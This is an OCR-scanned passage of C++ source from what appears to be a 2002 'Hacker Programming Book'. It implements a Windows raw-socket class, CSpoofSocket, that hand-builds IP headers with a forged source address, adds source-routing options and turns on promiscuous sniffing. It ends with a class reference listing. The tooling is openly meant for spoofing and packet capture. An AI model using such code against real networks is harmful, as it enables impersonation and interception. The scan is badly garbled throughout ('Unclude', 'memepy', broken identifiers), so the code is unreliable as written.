char TypeFlag) ; 
public: 

//Add options (according to the method name) 

void AddOption Timestamp (tOptionType tFlags, int itdaxStamps) ; 

void AddOptionLooseRoute (tRouting tRoute) ; 

void AddOption RecordRoute (int iMaxRoutes) ; 

void AddOption StrictRoute (tRouting tRoute) ; 

void AddOption Stream (unsigned short usStreamID) ; 

virtual void AddOption Security (unsigned short usType) ; 

virtual void AddOption Nothing () ; 

//Delete ali the options 
void Reset () ; 

//Set the autopad 

void SetAutoPad (BOOL bAutoPAD) ; 

//Add list terminator 

virtual voidAddOption^ENDLISTO; 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 



//Get the length of the buffer 
int GetBufferLength() ; 

//Get the buffer itself 
const char* GetBuffer () ; 

}; 

//Value not speci fied within winsock2 

//Thanks on this one goes to Bjorn Stickler author of Natas 

iifndef SIO_RCVALL 

idefine SIO^RCVALL 0x98000001 

iendif 

class CSpoof Socket : public CSpoofBase 
{ 

public: 

typedef enum _SocketShutdown 
l 

ssReceive, 
ssSend, 
ssBoth 
} Socket Shutdown; 

public: 

//Get the port if the remote connected system 
unsigned short GetPeerPort () ; 

//Close one way of the socket (receive, send,both) 
BOOL Shutdown (SocketShutdown eHow) ; 

//ctor and dtor 
CSpoof Socket () ; 
virtual ~CSpoof Socket () ; 

//Get the address of the remote connected system 
long GetPeerAddress ( ) ; 

//Turn to be a sniffer socket 
virtual BOOL Sniff (BOOL bSniff); 

//Resolve a DNS entry 

long ResolveDNS (LPCSTR lpAddress) ; 

//Check if an address is valid 

BOOL ValidAddress (LPCSTR lpAddress) ; 

//Recieve data from remote socket 

virtual int Receive (char* buf,int bufLen) ; 

//Get the IP options 
CIPOptions* GetOptions () ; 

//Do we allow options on this socket ? 
void SetOptions (BOOL bOptions) ; 

//Are we a raw socket ? 
void SetRaw (BOOL bRaw) ; 

//Set the packet Time to live 
void SetTTL (unsigned char ucTTL) ; 

//Calculate the checksum for TCP and UDP 

unsigned short CalculatePseudoChecksum (char *buf, int Buf Length , LPCSTR 
lpDestinationAddress , int iPacketLength) ; 

//Set source address for spoofing 

void SetSourceAddress (LPCSTR IpSourceAddress ) ; 

//Close the socket 
virtual BOOL Close () ; 

//Bind to a specific address 

virtual BOOL Bind (LPCSTR IpSourceAddress, int iPort=0) ; 
//Send data to a socket 

virtual BOOL Send (LPCSTR lpDestinationAddress, char* buf, int buf Length, unsigned 
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unsigned 
unsigned 
unsigned 
unsigned 



//Create a socket 
BOOL Create (int iProtocol) ; 

//Create an IP header 

static LPIpHeader ConstructStaticIPHeader (unsigned char ucProtocol, 

unsigned short usFragmentationFlags , 

unsigned char ucTTL, 

unsigned short usldentification, 

unsigned char ucHeaderLength) ; 

protected: 

//Create an IP header 

virtual LPIpHeader ConstructIPHeader (unsigned char ucProtocol , 

short usFragmentationFlags, 

char ucTTL, 

short usldentification, 

char ucHeaderLength) ; 

//Check this socket is valid 
BOOL CheckSocketValidO ; 

//Attach to a socket 

void AssignSocket (SOCKET sok, unsigned char ucProtocol=IPPROTO_TCP) ; 

//Attach to a socket by constructor 
CSpoof Socket (SOCKET sok) ; 

/ /Indication if we are a raw socket 
BOOL isRaw() ; 

//Set the protocol we are working on 
void SetProtocol (int iProtocol) ; 

/ /Calculate the data checksum 

unsigned short CalculateChecksum (unsigned short* usBuf,int iSize) ; 

//Is our socket valid ? 
BOOL ValidSocket () ; 

//Get the socket handle 
SOCKET GetHandleO ; 

/ / initialize ali the private memebers 
virtual void InitializelP () ; 

/ /Set the address in the IP header 

virtual void Set IPHeaderAddress (LPIpHeader lpHead, LPCSTR IpSourceAddress, LPCSTR 
lpDestinationAddress) ; 



/ /Last stop before sending the header 

virtual void FinalIPHeader (LPIpHeader lpHead); 

//Remote address we are conencted to 
sockaddrin m^ConnectedTo ; 
private: 

/ '/Reseolve DNS 

sockaddr_in pResolveDNS (LPCSTR lpAddress) ; 



//Our options 
CIPOptions* m_IPOptions ; 

//Do we have options 
BOOL m_Options; 

//Are we raw ? 
BOOL m_Raw; 
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unsìgned char m_TTL; 

//The protocol 

unsìgned char m Protocol; 

//Our source address 
LPCSTR m_SourceAddress ; 

//The actual socket handle 
SOCKET m_Spoof Socket ; 

}; 

// Spoof Socket . cpp 



Unclude "stdafx.h" 
iinclude "Spoof Socket . h " 

///////////////////////////////////////////////////////////////////////////// 
// CSpoof Socket 

idefine CSpoof Socket^LOGNAME "CSpoof Socket" 
ideflne CIPOptlons_LOGNAME "CIPOptions" 

CSpoof Socket :: CSpoof Socket ( ) : CSpoofBasef) 
{ 

try 
{ 

SetName ( CSpoof Socket LOGNAME ) ; 
InitializelP () ; 

} 

ERROR_HANDLER ( "CSpoof Socket ") 

ì 

CSpoof Socket : : CSpoof Socket (SOCKET sok) : CSpoof Base () 
{ 

//Check It 's a valid socket 
if (sok!=INVALID_SOCKET) 

ReportError ("CSpoof Socket" , "Received invalid socket!"); 



else 



try 
{ 

SetName ( CSpoof Socket LOGNAME) ; 
AssignSocket (sok) ; 

} 

ERROR_HANDLER ( "CSpoof Socket ") 



CSpoof Socket : : ~CSpoof Socket () 
{ 



try 
{ 



//Delete options 
SetOptlons (FALSE) ; 



Close () ; 

} 

ERROR_HANDLER ( "~CSpoof Socket ") 

} 

///////////////////////////////////////////////////////////////////////////// 
// CSpoof Socket member functions 

BOOL CSpoof Socket : : Create (int IProtocol) 
{ 

try 
( 

//Here we create the raw socket 

if (m_Raw 1 1 iProtocol==IPPROTO_ICMP) 

m_SpoofSocket=socket (AF__INET , SOCK_RAW, IProtocol) ; // 'IProtocol) ; 

else 

if (iProtocol==IPPROTO_TCP) 

m_SpoofSocket=socket (AF_INET, SOCK_ S TREAM, iProtocol) ; 
else if (iProtocol==IPPROTO_UDP) 

m_SpoofSocket=socket (AF_INET, SOCK_DGRAM, iProtocol) ; 
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if (m_SpoofSocket==INVALID_SOCKET) 
{ 

//Error 

SetLastError ( "Create ") ; 
return FALSE; 

ì 

if (m_Raw) 
{ 

//Set that the application will send the IP header 
unsigned int iTrue=l; 



if (setsockopt (m_Spoof Socket , IPPROTO_IP, IP_HDRINCL, (char*) SiTrue, sizeof (iTrue) ) = 
=SOCKET_ERROR) 

{ 

//Check for options error 
SetLastError ( "Create ") ; 
return FALSE; 

} 

} 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "Create ", FALSE) 

} 

BOOL CSpoof Socket :: Send (LPCSTR lpDestinationAddress, char* buf,int bufLength, unsigned 

short usDestinationPort) 

{ 

try 
{ 

//Quit if not ok 
if ( !CheckSocketValid() ) 
return FALSE; 

//Define the target address 
sockaddr_in m_TargetAddress ; 

memset ( &m_TargetAddress , 0, sizeof (m_TargetAddress ) ) ; 
m_TargetAddress . sin_family=AF_INET; 

m_TargetAddress . sin_addr . s_addr=inet_addr (lpDestinationAddress) ; 
m_TargetAddress . sin port=htons (usDestinationPort ) ; 

//packet send status ? 
int iResult; 

//Only if allowing raw headers !! 

if (m_Raw) 

{ 

//Header length 

unsigned char ucHeaderLength=IpHeaderLength ; 

if (m_Options) 

ucHeaderLength+=m_IPOptions—>GetBufferLength () ; 

//First construct the packet 
LPIpHeader 

lpHead=ConstructIPHeader (rn_Protocol, IpFragFlag_DONT_FRAG, m_TTL, (unsigned 
short ) GetCurrentProcessId () , ucHeaderLength) ; 

//Set the address 

SetlPHeaderAddress (lpHead,m_SourceAddress, lpDestinationAddress) ; 

//Now add some more options 
int iTotalLength; 

iTotalLength=ucHeaderLength+buf Length; 
//Set the header 

lpHead->TotalLength=htons (iTotalLength) ; 

//Need to construct a new packet 
char* newBuf=new char [iTotalLength] ; 

//Copy two buffers 

memcpy (newBuf, lpHead, IpHeaderLength ) ; 
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//Do we need to copy options ? 
if (m__Cptions) 

memcpy (newBuf +IpHeaderLength , m_IPOptions— 
>GetBuffer () , m_IPOptions->GetBufferLength () ) ; 

//Only if not nuli 
if (buf) 

memcpy (newBuf+ucHeaderLength, buf, bufLength) ; 
//Calculate the checksum 

lpHead->CheckSum=CalculateChecksum ( (unsigned 
short *) newBuf, iTotalLength) ; 

//Alert everyone this is the final header 
FinalIPHeader (lpHead) ; 

//Recopy the ip 

memcpy (newBuf, lpHead, IpHeaderLength) ; 
//Send the data 

iResult=sendto (GetHandle () , (const 
char *) newBuf , iTotalLength , 0, (sockaddr*) Sm_TargetAddress , sizeof (m_TargetAddress ) ) ; 

if (iResult==SOCKET_ERROR) 

SetLastError ("Send - Raw"); 

//Dispose of the buffer 
delete newBuf; 

//Dispose the header 
delete lpHead; 

} 

else 
{ 

iResul t = ! SOCKET_ERROR; 

//Insert options 
//if (m_Options) 
//if 

(setsockopt (GetHandle () , IPPROTO_IP, IP_OPTIONS, m_IPOptions->GetBuffer () , m_IPOptions- 
>GetBufferLength () ) ==SOCKET_ERROR) 

//Error 

//iResul t =SOCKET_ERROR; 

//else 

// 

//else 

//No options 

//iResult=setsockopt (GetHandle () , IPPROTO_IP, IP_OPTIONS, NULL, 0) ; 

//Check if we had an error 
if (iResult!=SOCKET_ERROR) 

//Use regular send ! ! ! 
iResult=sendto (GetHandle () , (const 
char* ) buf ', bufLength, 0, (sockaddr*) Sm_TargetAddress , sizeof (m_TargetAddress) ) ; 
} 

if (iResult==SOCKET_ERROR) 
//Set the error 
SetLastError ( "Send") ; 

return iResult ! =SOCKET_ERROR; 

} 

ERROR_HANDLER_RETURN ( "Send ", FALSE) 

ì 

LPIpHeader CSpoof Socket :: ConstructIPHeader (unsigned char ucProtocol, 
short usFragmentationFlags , 
char ucTTL, 
short usldentification, 
char ucHeaderLength) 



unsigned 
unsigned 
unsigned 
unsigned 
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usFragmentationFlags , 
ucTTL, 

usldentification, 
ucHeaderLength) ; 



void CSpoof Socket : : SetlPHeaderAddress (LPIpHeader lpHead, LPCSTR IpSourceAddress, 

LPCSTR lpDestinationAddress) 

{ 

try 
l 

//We need to place the header 

//If source is NULL then we need to use de fault source 

if (! IpSourceAddress) 

{ 

//We will implement it 

ì 

else 

//Use sockets2 

lpHead->sourceIPAddress=inet_addr (IpSourceAddress) ; 
//Place destination address 

lpHead->destIPAddress=inet_addr (lpDestinationAddress) ; 
//Done 

} 

ERROR_HANDLER ( "SetlPHeaderAddress ") 

} 

BOOL CSpoof Socket : -.ValidSocket () 
{ 

return m_Spoof Socket ! =INVALID_SOCKET ; 

) 



unsigned short CSpoof Socket :: CalculateChecksum (unsigned short *usBuf, int ISize) 
{ 

try 
{ 

unsigned long usChksum=0; 

//Calculate the checksum 

while (iSize>l) 

{ 

usChksum+= *usBuf++; 
iSize-=sizeof (unsigned short); 

} 



//If we have one char left 
if (iSize) 

usChksum+=* (unsigned char*) usBuf; 

//Complete the calculations 

usChksum= (usChksum » 16) + (usChksum & Oxffff) ; 
usChksum+= (usChksum » 16); 

//Return the value (inversed) 
return (unsigned short) (~usChksum) ; 

} 

ERROR_HANDLER_RETURN ("Cai culat eChecksum " , 0) 



BOOL CSpoof Socket : :Bind (LPCSTR IpSourceAddress, int iPort) 
{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return FALSE; 



//Create the locai address 
sockaddr_in soSrc; 



//Set to 0 
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soSrc. sin_family=AF_INET; 

if (IpSourceAddress) 

soSrc. sin_addr . s_addr=inet_addr (IpSourceAddress) ; 

else 

soSrc . sin_addr . s_addr=ADDR_ANY ; 
soSrc.sin _port=htons (iPort) ; 
//Now we need to bind it 

if (bind (GetHandle () , (sockaddr*) SsoSrc, sizeof (soSrc) ) ) 
{ 

//Error 

SetLastError ( "Bind") ; 
return FALSE; 

) 

else 

//Save the address 
m_ConnectedTo=soSrc; 

//If already has a source address then don 't change it 
if ( !m_SourceAddress) 

m_SourceAddress=lpSourceAddress ; 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "Bind ", FALSE) 



} 



SOCKET CSpoofSocket : : GetHandle () 
{ 

return m_Spoof Socket ; 

} 

BOOL CSpoofSocket : : CheckSocketValid ( ) 
{ 

try 
{ 



socket ! ") ; 



//Check if socket is invalid 
if (IValidSocket () ) 
{ 

ReportError ( "CheckSocketValid" , "Operation made on non existant 
return FALSE; 

) 

//OK 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "CheckSocketValid", FALSE) 



BOOL CSpoofSocket : :Close () 
{ 

try 
( 



//Close the socket 
//Quit if not ok 
if ( IValidSocket () ) 
return FALSE; 

//Close it 

if (closesocket (GetHandle () ) ==SOCKET_ERROR) 
{ 

//Error in closing ? 
SetLastError ( "Close ") ; 
return FALSE; 

) 

//Set the socket to invalid 
m_SpoofSocket =INVALID_SOCKET; 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "Close ", FALSE) 
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void CSpoof Socket :: SetProtocol (int iProtocol) 
{ 

m_Prot ocol=iProt ocol ; 

} 

void CSpoof Socket :: SetSourceAddress (LPCSTR IpSourceAddress) 
{ 

try 
{ 

//Set the source address, in case we want to spoof it 
m_SourceAddress=lpSourceAddress; 

} 

ERROR_HANDLER ( "SetSourceAddress ") 

ì 



unsigned short CSpoof Socket :: CalculatePseudoChecksum (char *buf, int BufLength, LPCSTR 

lpDestinationAddress , int iPacketLength) 

{ 

try 
{ 

//Calettiate the checksum 
LPPseudoHeader IpPseudo; 
lpPseudo=new PseudoHeader ; 

IpPseudo— >DestinationAddress=inetaddr (lpDestinationAddress) ; 
lpPseudo->SourceAddress=inet_addr (m_SourceAddress) ; 
lpPseudo->Zeros=0 ; 
lpPseudo->PTCL=m_Prot ocol ; 
lpPseudo->Length=htons (iPacketLength) ; 



//Calculate checksum of ali 
int iTotalLength; 

iTotalLength=PseudoHeaderLength+BufLength; 
char* tmpBuf; 

tmpBuf=new char [i TotalLength ] ; 
//Copy pseudo 

memepy (tmpBuf , IpPseudo, PseudoHeaderLength) ; 
//Copy header 

memepy (tmpBuf +PseudoHeaderLength, buf, BufLength) ; 



//Calculate the checksum 
unsigned short usChecksum; 

usChecksum=CalculateChecksum ( (unsigned short *) tmpBuf, iTotalLength) ; 



//Delete ali 
delete tmpBuf; 
delete IpPseudo; 

//Return checksum 
return usChecksum; 

} 

ERROR_HANDLER_RETURN ( "CalculatePseudoChecksum ", 0) 



void CSpoof Socket : : SetTTL (unsigned char ucTTL) 
{ 

try 
{ 

//Quit if not ok 
if (!CheckSocketValid() ) 
return; 

if (m_Raw) 
{ 

//Set the ttl 
J1L TTL=ucTTL; 

} 

else 

setsockopt (GetHandle () , IPPROTO_IP, IP_TTL, (const 
char*) &ucTTL, sizeof (ucTTL) ) ; 
} 

ERROR_HANDLER ( "Set TTL ") 
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void CSpoof Socket :: SetRaw (BOOL bRaw) 
{ 

//Do we want to create raw socket (YES! ! ) 
m_Raw=bRaw ; 

ì 

void CSpoof Socket : : SetOptions (BOOL bOptions) 
{ 

try 
{ 

//Do we want options, normaly not 
m_Options=bOptions ; 

if (m_IPOptions) 
{ 

delete m__IPOptions; 
m_ IPOptions=NULL; 

ì 

if (bOptions) 

m_IPOptions=new CIPOptions ; 

} 

ERROR_HANDLER ( "SetOptions ") 



CIPOptions : : CIPOptions () 
{ 

try 
( 

SetName (CIPOptions_LOGNAME) ; 

//Initialize our buffer 
m_Buffer=new char [IPOption_SIZE] ; 

//Set our buffer to nothing 
Reset () ; 

//Set auto pad 
m_Aut oPAD=TRUE; 

} 

ERROR_HANDLER ( "CIPOptions ") 



} 



CIPOptions : : ~CIPOptions ( ) 
i 

try 
{ 

delete m_Buffer; 

} 

ERROR_HANDLER ( "~CIPOptions ") 

} 

void CIPOptions : :AddOption Nothing () 
{ 

try 
{ 

//Add option do nothing 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption_DONT_COPY, IPOption_CONTROL, IPOption_NO_OPERATION) ; 
//Add it to buffer 

AddToBuffer ( (char*) &0T, sizeof (OT) ) ; 

} 

ERROR^HANDLER ( "AddOption^Nothing" ) 

) 

tOptionType CIPOptions : : GetOption (unsigned char CopyFlag, unsigned char ClassFlag, 

unsigned char TypeFlag) 

{ 

//Return a single option type 

return CopyFlag / ClassFlag / TypeFlag; 
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void CIPOptions : .-AddToBuffer (char *buf, int BufLength) 
{ 

if (m__BufferLength<IPOption_SIZE) 
{ 

//Add our option to the buffer 

memcpy (m_Buffer+m_BufferLength, buf, BufLength) ; 
m BufferLength+=BufLength; 

} 

} 

const char* CIPOptions : : GetBuffer () 
{ 

return m_Buffer; 

ì 

int CIPOptions : : GetBufferLength () 
{ 

try 
l 

//Check if auto pad or not 
if (m_AutoPAD) 
if 

(m_BufferLength/IPOption_WRAPSIZE==(m_BufferLength/IPOption_WRAPSIZE) *IPOption_WRAPSIZ 
E && m_BufferLength>=IPOption_WRAPSIZE) 

return mBufferLength; 

else 

return 

int((float)m_BufferLength/IPOption_WRAPSIZE+l)*IPOption_WRAPSIZE; 
else 

return m_BufferLength; 

} 

ERROR_HANDLER_RETURN ( "GetBufferLength ",0) 

ì 

void CIPOptions : :AddOption_ENDLIST() 
{ 

try 
{ 

//End the list of options 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption_DONT_COPY, IPOption^CONTROL, IPOption_END_OPTION) ; 
//Add it to buffer 

AddToBuffer ( (char*) &0T, sizeof (OT) ) ; 

} 

ERROR_HANDLER ( "AddOption_ENDLIST ") 

) 

void CIPOptions :: SetAutoPad (BOOL bAutoPAD) 
{ 

m_Aut oPAD=bAutoPAD; 

) 

CIPOptions* CSpoof Socket : : GetOptions () 
{ 

return m_IPOptions; 

} 

void CIPOptions :: Reset () 
{ 

try 
( 

//Set ali to zeros 

memset (m_Buffer, 0, IPOption_SIZE) ; 

//Our buffer length 
m_BufferLength=0; 

} 

ERROR_HANDLER ( "Reset ") 

) 

void CIPOptions : :AddOption_Security (unsigned short usType) 
{ 

try 
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//Add option security 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOpt±on_COPY, IPOption_CONTROL, IPOption_SECURI1Y) ; 
//Add it to buffer 

AddToBuffer ( (char*) SOT, sizeof (OT) ) ; 
//Add length 

OT=IPOption_SECURITY_LENGTH; 
AddToBuffer ( (char*) SOT, sizeof (OT) ) ; 

//Add options 

AddToBuffer ( (char*) SusType, sizeof (usType) ) ; 
//Add zeros 

unsigned short usZeros=0; 
unsigned char ucZeros=0 ; 

//A hacker would enumarate these values, according to the RFC 
/ /Compartments 

AddToBuffer( (char*) SusZeros, sizeof (usZeros) ) ; 
//Handling restrictions 

AddToBuffer( (char*) SusZeros, sizeof (usZeros) ) ; 



/ /Transmition control code (TCC) 

AddToBuffer ( (char*) SusZeros, sizeof (usZeros) ) ; 

AddToBuffer ( (char*) SucZeros, sizeof (ucZeros) ) ; 

//Done 

} 

ERROR_HANDLER ( "AddOption^Security" ) 



} 



void CIPOptions : :AddOption_Stream (unsigned short usStreamID) 
{ 

try 
( 

//Add option security 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption_COPY, IPOption_C0NTR0L, IPOption_STREAM) ; 
//Add it to buffer 

AddToBuffer ( (char*) SOT, sizeof (OT) ) ; 
//Add length 

OT=IPOption_STREAM_LENGTH; 
AddToBuffer ( (char*) SOT, sizeof (OT) ) ; 

//Add options 

unsigned short usnStreamID; 
usnStreamID=htons (usStreamID) ; 

AddToBuffer( (char*) SusnStreamID, sizeof (usnStreamID) ) ; 

} 

ERROR_HANDLER ( "AddOption_Stream ") 

) 



void CIPOptions : :AddOption_StrictRoute (tRouting tRoute) 
{ 

try 
( 

AddOption_Route (IPOption_STRICT_R0UTING, tRoute) ; 

} 

ERROR^HANDLER ( "AddOption^StrictRoute ") 

} 

void CIPOptions : : AddOption_RecordRoute (int iMaxRoutes) 
{ 

try 
{ 
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//Add option strict route 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption__DONT_COPY, IPOption_CONTROL, IPOption__RECORD_ROUTE) ; 
//Add it to buffer 

AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 
//Add the length 

OT=iMaxRoutes*4+IPOption_STRICT_ROUTING_LENGTH; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

//Add the pointer 

OT=IPOpti on_STRICT_ROUTING_POINTER ; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

char cNothing[IPOption_SIZE] = " "; 
AddToBuffer (cNothing, iMaxRoutes*4 ) ; 

} 

ERROR_HANDLER ( "AddOption^RecordRoute ") 



void CIPOptions : :AddOption_Route (tOptionType tRouteType , tRouting tRoute) 
{ 

try 
{ 

//Option for strict routine 
//Add option strict route 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption_COPY, IPOption__CONTROL, tRouteType) ; 
//Add it to buffer 

AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 
//Add the length 

OT=tRoute . iRoutes*4+IPOption_STRICT_ROUTING_LENGTH; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

//Add the pointer 

OT=IPOption_STRICT_ROUTING_POINTER; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

//Add the routing table 

AddToBuffer ( (char*) tRoute. ulRoutes, tRoute. iRoutes*4) ; 

} 

ERROR_HANDLER ( "AddOption_Route ") 



} 



void CIPOptions : :AddOption_LooseRoute (tRouting tRoute) 
{ 

try 
( 

AddOption_Route (IPOption_LOOSE_ROUTING, tRoute) ; 

} 

ERROR^HANDLER ( "AddOption^LooseRoute ") 

) 

void CIPOptions : :AddOption Timestamp (tOptionType tFlags, int iMaxStamps) 
{ 



try 
{ 



//Add option for timestamp 
tOptionType OT; 

//Get the option 

OT=GetOption (IPOption_DONT_COPY, IPOption DEBUGGING, IPOption_TIMESTAMP) ; 
//Add it to buffer 

AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 
//Add the length 

OT=iMaxStamps*IPOption_TIMESTAMP_SIZE+IPOption__TIMESTAMP_LENGTH-l; 
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//Add the pointer 
OT=IPOption_ TIMESTAMP_LENGTR; 
AddToBuffer ( (char*) &OT, sizeof (OT) ) ; 

//Add the flags 

AddToBuffer ( (char*) StFlags, sizeof (tFlags) ) ; 

//Add the empty buffer 

char cNothing [IPOption__SIZE] = " "; 

AddToBuffer (cNothing, iMaxStamps*IPOption_TIMESTAMP_SIZE) ; 

} 

ERROR_HANDLER ( "AddOption_Timestamp ") 

ì 

BOOL CSpoof Socket :: isRaw ( ) 
{ 

return m_Raw; 

ì 



void CSpoof Socket : : InitializelP () 
{ 

try 
{ 

//Invalid the socket 
m_SpoofSocket =INVALID_SOCKET ; 

//More invalids 
m_SourceAddress=NULL; 

//Some defaults 
m_ TTL=IP_DEF_ TTL; 

/ /We don't want raw header (so it can work on win 98/NT) 
m_Raw=FALSE ; 

//Set our options 
m_IPOptions=NULL; 

//Not connected 

memset (&m_ConnectedTo, 0, sizeof (m_ConnectedTo) ) ; 

//Set options to false 
SetOptions (FALSE) ; 

} 

ERROR_HANDLER ( "InitializelP ") 



void CSpoof Socket : :AssignSocket (SOCKET sok,unsigned char ucProtocol) 
{ 

try 
{ 

//Sets the protocol 
m_Protocol=ucProtocol; 

//Binds to a socket 
mSpoofSocket=sok; 

//Set non raw 
SetRaw (FALSE) ; 

} 

ERROR_HANDLER ( "AssignSocket ") 



int CSpoof Socket : .-Receive (char *buf, int bufLen) 
{ 



try 
{ 



if (ÌValidSocket () ) 

return SOCKET_ERROR; 

//Receive data 
int iResult; 

//Receive 
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sockaddr saConnected; 
int iTmp; 

iTmp=slzeof (saConnected) ; 
//Accept it 

iResult=recvfrom(GetHandle () , buf, bufLen, NULL, SsaConnected, SiTmp) ; 

//If OK set it 

if (iResult!=SOCKET_ERROR) 

memcpy (&m_ConnectedTo, SsaConnected, sizeof (saConnected) ) ; 

} 

else 

iResult=recv (GetHandle () , buf, bufLen, NULL) ; 

//Check if error 
if (iResult==SOCKET_ERROR) 
//Error 

SetLastError ( "Receive ") ; 

//Number of bytes received 
return iResult; 

} 

ERROR_HANDLER_RETURN ( "Receive ", SOCKET^ERROR) 



} 



BOOL CSpoof Socket : :ValidAddress (LPCSTR lpAddress) 
{ 

try 
( 

return inet_addr (lpAddress) ! =INADDR__NONE ; 

} 

ERROR_HANDLER_RETURN ( "ValidAddress ", FALSE) 

) 

sockaddr_in CSpoof Socket : :pResolveDNS (LPCSTR lpAddress) 
{ 

//Convert it to the address 

sockaddr^in adr; 

memset (&adr, 0, sizeof (adr) ) ; 

try 
{ 

/ /Resolve the DNS 
hostent* hp; 

hp=gethostbyname (lpAddress) ; 

//Check if this address exists 
if (!hp) 

//Error 

SetLastError ( "pResolveDNS") ; 

else 

//Copy the data 

memcpy ( S adr . sin addr, hp->h addr, hp->h length) ; 
return adr; 

} 

ERROR_HANDLER_RETURN ( "pResolveDNS ", adr) 



long CSpoof Socket :: ResolveDNS (LPCSTR lpAddress) 
{ 



try 
( 



//Resolve the DNS 
sockaddr in tmp; 

tmp=pResolveDNS (lpAddress) ; 

//Check if valid 

if (tmp . sin_addr . Sun . Saddr==0) 
//Error 
return 0; 

else 
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ERROR_HANDLER_RETURN ( "Resol veDNS " , 0) 

ì 

BOOL CSpoof Socket :: Sniff (BOOL bSniff) 
{ 

//Start sniffing 
if ( ÌValidSocket () ) 
return FALSE; 

try 
l 

unsigned long ulBytes; 
if 

(WSAIoctl (GetHandle () , SIO_RCVALL, &bSniff, sizeof (bSniff) , NULL, 0, SulBytes, NULL, NULL) ) 
{ 

//Error 

SetLastError ( "Sniff") ; 
return FALSE; 

ì 

return TRUE; 

} 

ERROR_HANDLER_RETURN ("Sniff", FALSE) 

) 

long CSpoof Socket : : GetPeerAddress () 
{ 

//Get the address we are connected to 
return m_ConnectedTo . sinaddr. S un . Saddr; 

) 

BOOL CSpoof Socket :: Shutdown (SocketShutdown eHow) 
{ 

if ( ! CheckSocketValid ( ) ) 
return FALSE; 

try 
{ 

int iHow; 

//Convert the how to a real flag 
if (eHow==ssReceive) 

iHow=SD_RECEIVE; 
else if (eHow==ssSend) 

iHow=SD_SEND; 

else 

iHow=SD_BOTH; 

//Do it 

if (shutdown (GetHandle () , iHow) ) 
{ 

SetLastError ( "Shutdown ") ; 
return FALSE; 

} 

return TRUE; 

} 

ERROR_HANDLER_RETURN ( "Shutdown ", FALSE) 

unsigned short CSpoof Socket : : GetPeerPort () 

return htons (m ConnectedTo . sin port ) ; 

void CSpoof Socket : -.FinalIPHeader (LPIpHeader lpHead) 
//We don 't do anything 

LPIpHeader CSpoof Socket :: ConstructStaticIPHeader (unsigned char ucProtocol, 
unsigned short usFragmentationFlags , 
unsigned char ucTTL, 
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unsigned short usldentification, 

unsigned char ucHeaderLength) 

try 
{ 



//Need to construct the IP header 
LPIpHeader lpHead=new IpHeader; 

//Header length (in 32 bits) 

lpHead->HeaderLength__Version=ucHeaderLength/4 + IpVersion*16; 
//Protocol 

lpHead->Protocol=ucProtocol ; 
//Fragmentation flags 

lpHead—>FragmentationFlags=htons (usFragmentationFlags) ; 

//Time to live 
lpHead->TTL=ucTTL; 

//Checksum - set to 0 
lpHead->CheckSum=0 ; 

//Identification 

lpHead—>Identification=htons (usldentificatlon) ; 
//Precedence 

lpHead->TypeOfService=IpService_ROUTINE; 

//Return IP to user 
return lpHead; 

} 

ERROR_HANDLER_STATIC_RETURN ( CSpoof Socket LOGNAME, "ConstructIPHeader" , NULL) 



Base C 1 a s s e s 



CSpoofBase 



Data I t e m s 



sockaddr in 
CIPOptions * 
BOOL 

unsigned char 

BOOL 

LPCSTR 

SOCKET 

unsigned char 



m ConnectedTo 
mlPOptions 
m Options 
m_Protocol 
m Raw 

mSourceAddress 
mSpoof Socket 
m_TTL 



Remote address we are conencted to 

Our options 

Do we have options 

The protocol 

Are we raw ? 

Our source address 

The actual socket handle 

Time to live 



Constructors 



CSpoof Socket ( SOCKET sok ) 
CSpoofSocket () 



Attach to a socket by constructor 
ctor and dtor 



Destructors 



virtual 



-CSpoofSocket () 



Copyright 2002 Flavio Bernardotti - Tel. (39) 380 7097051 



Hacker Programming Book 




Functions 



void 

virtual BOOL 
unsigned short 
unsigned short 

BOOL 

virtual BOOL 
virtual LPIpHeader 



static LPIpHeader 



BOOL 

virtual void 

SOCKET 
CIPOptions * 
long 

unsigned short 
virtual void 
BOOL 

sockaddr_in 
virtual int 

long 

virtual BOOL 

virtual void 

void 

void 

void 
void 

void 

BOOL 



AssignSocket ( SOCKET sok, unsigned 
char ucProtocol=IPPROTO_TCP ) 

Bind ( LPCSTR IpSourceAddress, int 
iPort=0 ) 

CalculateChecksum ( unsigned short* 
usBuf, int iSize ) 

CalculatePseudoChecksum ( char *buf, 
int BufLength, LPCSTR 
lpDestinationAddress , int 
iPacketLength ) 

CheckSocketValid Q 
Close () 

ConstructIPHeader ( unsigned char 
ucProtocol, unsigned short 
usFragmentationFlags , unsigned char 
ucTTL, unsigned short 
usldentification, unsigned char 
ucHeaderLength ) 

Con structStati cIPHea der ( unsigned 
char ucProtocol , unsigned short 
usFragmentationFlags , unsigned char 
ucTTL, unsigned short 
usldentification, unsigned char 
ucHeaderLength ) 

Create ( int iProtocol ) 

FinalIPHeader ( LPIpHeader lpHead ) 

GetHandle Q 
GetOptions () 
GetPeerAddress ( ) 



GetPeerPort () 
InitializelP ( ) 
isRaw Q 

pResolveDNS ( LPCSTR IpAddress ) 
Receive ( char* buf, int bufLen ) 

ResolveDNS ( LPCSTR IpAddress ) 

Send ( LPCSTR lpDestinationAddress, 
char* buf, int bufLength, unsigned 
short usDestinationPort=0 ) 

Set IPHeaderAddress ( LPIpHeader 
lpHead, LPCSTR IpSourceAddress , 
LPCSTR lpDestinationAddress ) 

SetOptions ( BOOL bOptions ) 
SetProtocol ( int iProtocol ) 

SetRaw ( BOOL bRaw ) 

SetSourceAddress ( LPCSTR 
IpSourceAddress ) 

Set TTL ( unsigned char ucTTL ) 
Shutdown ( SocketShutdown eHow ) 



